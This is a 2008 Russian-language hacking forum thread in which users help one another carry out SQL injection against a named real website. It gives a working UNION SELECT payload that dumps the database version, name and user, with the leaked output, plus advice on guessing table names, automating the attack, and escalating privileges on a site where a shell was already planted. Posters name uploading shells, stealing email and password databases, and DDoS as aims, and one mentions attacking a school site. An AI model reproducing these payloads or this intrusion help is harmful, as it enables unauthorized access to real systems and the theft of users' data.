 |
|
07.05.2008, 18:57
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Zergius, прочитать пару статей по SQL-инъекциям. Их тут очень много, можно даже поиск не юзать, просто зайти в раздел "Статьи". Там всё подробно расписано.
з.ы. https://forum.antichat.ru/thread19605.html вот 
з.з.ы. Если тебе интересно зачем это вообще надо - ну много вариантов: шелл залить, инфу вытащить (базу мыл, пассы и т.п.), заддосить..
Последний раз редактировалось n0ne; 07.05.2008 в 20:19..
|
|
|
07.05.2008, 21:06
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
Читал статью тоже так же ниче не получилось
|
|
|
|
07.05.2008, 21:14
|
|
Новичок
Регистрация: 04.12.2007
Сообщений: 6
С нами:
9702655
Репутация:
1
|
|
Просто я ни в одной статье такого не вижу, а насчет инфы-это извесный сайт по фотошопу, как пойму как вытащить инфу(учиться как то надо), так админу думаю расскажу...
Млин, все равно не догоняю =(((
|
|
|
|
07.05.2008, 21:16
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,c oncat_ws(0x2F,version(),database(),user()),7,8,9,1 0,11,12,13,14/*
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost
Доступа к information_schema нет. К форуму (phpbb) - тоже. Можешь попробовать подбирать названия таблиц вручную. Типа там users, members и тд.
|
|
|
|
07.05.2008, 21:18
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
Сообщение от diznt
Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
Читал статью тоже так же ниче не получилось
f5
|
|
|
|
07.05.2008, 21:19
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((
|
|
|
|
07.05.2008, 21:24
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от diznt
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((
Есть проги типа SQL Injection Tool от SQLHACK. Там если я не ошибаюсь можно организовать автоподбор. А вообще где-то тут была тема часто юзаемых имен для таблиц и колумнов. Поищи и проверь если хочешь.
Zergius, дай ссылку на сайт. На пальцах никто ничего не объяснит.
|
|
|
|
07.05.2008, 22:01
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
ООООООО МДЯЯЯЯ ВОТЬ ЭТО УЖЕ РЕАЛЬНЫЙ ППЦ)))))))) (p.s. наврятли чтото получиться имхо хотя не кто не знает что произойдет)
Сор за капс
|
|
|
|
07.05.2008, 23:32
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
Вот такое дело, был сайт на нем висел шелл долго, были права на редактирование индекса, потом админ убрал права на запись, какие есть возможные способы поднять права?
|
|
|
|
07.05.2008, 23:42
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Zergius не волнуйся у мя такая же трабла со школьным сайтом((
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
